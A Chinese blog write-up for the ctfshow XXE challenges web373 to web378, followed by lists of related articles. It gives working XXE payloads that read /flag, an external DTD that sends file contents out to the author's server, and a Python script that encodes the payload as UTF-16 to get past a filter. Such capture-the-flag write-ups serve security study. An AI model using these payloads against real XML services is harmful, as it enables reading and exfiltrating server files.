web373

XXE(XML External Entity Injection) 全称为 XML 外部实体注入。注入的是XML外部实体

参考文章：一篇文章带你深入理解漏洞之 XXE 漏洞

libxml_disable_entity_loader(false);:禁止加载外部实体。一个实体由三部分构成: 一个和号 (&), 一个实体名称, 以及一个分号 ( ; )

flag在flag里

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE XXE [
<!ENTITY cmd SYSTEM "file:///flag">
]>
<mumuzi>
<ctfshow>&cmd;</ctfshow>
</mumuzi>

web374-376

和373的区别是没有echo $ctfshow;，即无回显

因为没有回显，所以只能想办法带到自己vps里。

后面的题把xml头给过滤掉了，这里在vps上创建一个dtd文件，用于反弹shell

#test.dtd
<!ENTITY % dtd "<!ENTITY % xxe  SYSTEM 'http://xxx:10086/%file;'> ">
%dtd;
%xxe;

监听10086端口

然后POST发包即可在vps上收到

<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://xxx/test.dtd">
%aaa;
]>
<root>1</root>

其实当时这里卡了许久，4台vps，有一台一直都关了安全组（只开放了两常用端口），有一台没php环境，有一台被Streamlit占用，这台就是刚刚才装的php环境。自己给自己整麻了

web377

方法和上面一样，但是过滤http，需要编码绕过。

import requests
url = 'http://b70f356b-ab20-4df6-b661-d7827322fc80.challenge.ctf.show/'
data = '''<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://101.35.244.30/test.dtd">
%aaa;
]>
<root>1</root>'''
r = requests.post(url=url,data=data.encode('utf-16'))

web378

忒标准的 XXE

<!DOCTYPE XXE [
<!ENTITY cmd SYSTEM "file:///flag">
]>
<user><username>&cmd;</username>
</user>

ctfshow XXE web373-web378 wp相关推荐

1. ctfshow web入门 XXE web373~web378

   目录 web373 web374.375.376 web377 web378 学习链接: 一篇文章带你深入理解漏洞之 XXE 漏洞 - 先知社区 web373 burpsuite发包,不能用hackb ...

2. CTFShow XXE

   前言 XXE 的漏洞在我的上一篇文章有讲过,这里就不多说,直接看题 XXE外部实体注入 web373 有回显的文件读取 <?xml version="1.0"?> &l ...

3. CTFShow“萌心区”WP（上）

   CTFShow "萌心区"WP详解(上) 萌新认证 萌新_密码1 萌新_密码2 萌新_密码3 萌新_密码4 隐写1 隐写2 萌新_隐写2 萌新_隐写3 萌新_隐写4 萌新_隐写5 ...

4. ctfshow—2023愚人杯wp

   ctfshow-2023愚人杯wp 热身 热身 100 愚人杯比赛秉承欢乐.有爱.进取的精神 在群里师傅热心帮助下,已经开始第三届比赛啦! 欢迎各位师傅参加,希望大家玩的开心,比赛题目可以自由讨论.但 ...

5. [WP/ctfshow/XXE]ctfshow_XXE_web373-378

   外部实体注入 WEB373 // 允许加载外部实体 libxml_disable_entity_loader(false); // xml文件来源于数据流 $xmlfile = file_get_co ...

6. CTFshow 击剑杯 部分WP

   摆烂了摆烂了 太难了 聪明的师傅已经组队打起月赛了 试试能不能苟住前5 苟住了 复现的后面再补充吧 文章目录 1.Misc 中文识别带师 2.Web 简单的验证码 easyPOP 3.Pwn pwn0 ...

7. ctfshow sql注入 web171-web253 wp

   文章目录 参考文章 sql注入 web171 web172 web173 web174 web175 解法一 解法二 web176 web177 web178 web179 web180-web182 ...

8. CTFshow单身杯 部分wp

   前言:不会吧不会吧不会有人520521不约会打比赛吧 文章目录 1.单身杯热身题目 2.misc签到 3.没大没小的串串 4.任性老板 5.蛤壳雪茄-1 6.蛤壳雪茄-2 7.The Dancing ...

9. ctfshow 89-115 php特性 wp

   首先还是非常感谢群主大大和师傅们. 希望ctfshow平台越来越好,做大做强做辉煌. 链接:https://pan.baidu.com/s/12-uMIjaIDllXx4STQIbm5w 提取码:kr ...

最新文章

1. 深入理解 wpa_supplicant(一)
2. Get 了滤镜、动画、AR 特效，速来炫出你的短视频开发特技！
3. Thread 同步线程（打印机同步）
4. sublime linux 字体设置,Sublime Text的基本设置有哪些
5. 天天写业务代码？写业务代码中的成长机会！
6. 语言的顺序表的合拼_2020语文中考专题五：语言运用和综合性学习。掌握基础题五种题型...
7. 补丁 检测系统_大云制造 | BCLinux For ARM64 V7.6操作系统正式发布
8. 常见操作系统调度算法研究（2)
9. 3-5：类与对象中篇——默认成员函数之运算符重载
10. 允许活动内容在我的计算机上,然后就看到选项允许活动内容在我的计算机上的文件中运行...
11. DataBseDesign工作笔记003---ERStudio使用笔记_基本使用方法详解
12. vue组件之间互相传值：兄弟组件通信
13. 视频教程-Mikrotik RouterOS 软路由基础教程-网络技术
14. 日志管理系统之保存日志到数据库
15. gif一键抠图 在线_8个免费在线抠图网站 不会PS的小白也能一键抠出专业效果图...
16. 如何检索国外的博士论文
17. Tomcat Caused by:java.lang.IllegalArgumentException: 指定的主资源集[……]无效
18. Uni-app 实现离线打包 安卓篇
19. 发电子邮件怎么发，手机发电子邮件教程来了
20. 一个寒门博士的论文后记：我还是没有能力让母亲安享晚年

热门文章

1. 使用Mixamo绑定骨骼导入动画
2. 数据库基础内容（超级详细）
3. 黑石董事长：我今生所有的经验，总结起来，不过这54条！
4. 政策热市场冷 中国新能源汽车遇尴尬
5. 从白嫖百度AI Studi Telsa V100 32G训练资源到使用tensorflow训练全流程（个人用）
6. Arranging Wine
7. 2021年7月国产数据库排行榜：openGauss高歌猛进，GBase丢失第五
8. 服务器win10系统开机慢,win10专业版系统开机启动慢 三种方法帮你敲定
9. 英语用法整理_英式\美式英语区分
10. 微PE安装系统 不显示U盘中镜像文件 的解决方法